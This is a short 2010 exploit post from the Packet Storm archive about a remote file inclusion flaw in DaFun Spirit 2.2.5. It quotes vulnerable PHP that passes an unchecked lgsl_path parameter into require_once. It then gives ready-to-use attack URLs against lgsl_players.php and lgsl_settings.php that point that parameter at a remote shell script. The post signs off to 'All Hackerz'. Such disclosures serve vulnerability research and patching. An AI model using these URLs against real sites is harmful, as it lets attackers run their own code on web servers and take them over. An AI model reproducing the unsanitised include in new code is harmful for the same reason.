DaFun Spirit 2.2.5 Remote File Inclusion

2010-03-28T00:00:00
ID PACKETSTORM:87693
Type packetstorm
Reporter mat
Modified 2010-03-28T00:00:00

Description

                                        
                                            ` \\\|///  
\\ - - //  
( @ @ )  
----oOOo--(_)-oOOo--------------------------------------------------  
DaFun Spirit 2.2.5 Multiple Remote File Include Vulnerability  
Script: http://code.google.com/p/dafunspirit/downloads/list  
Author: mat  
Mail: rahmat_punk@hotmail.com  
---------------Ooooo------------------------------------------------  
( )  
ooooO ) /  
( ) (_/  
\ (  
\_)  
  
Vuln Code  
  
//-----------------------------------------------------------------------------------------------------------+  
  
$lgsl_path = ""; // RELATIVE PATH BETWEEN THIS FILE AND THE LGSL FOLDER FOR PAGE INTEGRATION  
  
//-----------------------------------------------------------------------------------------------------------+  
  
require_once($lgsl_path."lgsl_protocol.php");  
  
$get_ip = $_GET[ip];  
$get_port = $_GET[port];  
  
//-----------------------------------------------------------------------------------------------------------+  
  
Usage: http://[target]/[path]/modules/dfss/lgsl/lgsl_players.php?lgsl_path=http://[shellscript]  
http://[target]/[path]/modules/dfss/lgsl/lgsl_settings.php?lgsl_path=http://[shellscript]  
  
  
Greetings: All Hackerz  
  
`